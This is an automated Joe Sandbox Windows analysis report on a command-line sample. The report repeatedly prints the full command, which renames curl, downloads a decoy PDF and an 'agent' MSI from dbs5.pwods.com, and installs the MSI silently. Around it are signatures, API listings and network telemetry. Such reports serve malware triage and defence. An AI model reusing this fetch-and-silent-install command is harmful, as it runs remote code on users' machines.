Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1528038
Infos:

Detection

Score:8
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 4400 cmdline: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7128 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • TNheBOJElq.exe (PID: 1532 cmdline: TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • TNheBOJElq.exe (PID: 6484 cmdline: TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • msiexec.exe (PID: 7096 cmdline: C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 432 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5472, ProcessCommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", ProcessId: 4400, ProcessName: cmd.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,3_2_00103EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash,3_2_0010F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,3_2_0010F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_0010F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,3_2_0010EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00106400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00106591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,3_2_0010C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010C730 CryptHashData,3_2_0010C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_0010C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: -----BEGIN PUBLIC KEY-----3_2_000E77F7
Source: TNheBOJElq.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknownHTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DDB77 recv,WSAGetLastError,3_2_000DDB77
Source: global trafficHTTP traffic detected: GET /download/pdf HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /download/agent HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */*
Source: TNheBOJElq.exeString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.drString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: dbs5.pwods.com
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbs5.pwods.com/download/agent
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbs5.pwods.com/download/pdf
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000D15353_2_000D1535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000FA8D83_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000CE1273_2_000CE127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DA9B33_2_000DA9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000EC1FD3_2_000EC1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010CAA03_2_0010CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DFAEC3_2_000DFAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_001133B03_2_001133B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000D44153_2_000D4415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000E25B83_2_000E25B8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000DD6AD appears 302 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000C913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000D201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000D20E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000DD632 appears 246 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000D2564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: String function: 000D251E appears 48 times
Source: classification engineClassification label: clean8.win@11/3@1/2
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,3_2_000C310D
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agentJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qnJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,3_2_000DD33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DCEEF push edi; retn 000Dh3_2_000DCEF0
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-42381
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeAPI coverage: 8.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll||
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0011155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,3_2_000DD33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00110CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0011155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_001116BE SetUnhandledExceptionFilter,3_2_001116BE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agentJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qnJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0011137A cpuid 3_2_0011137A
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00111775
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,3_2_0010699F
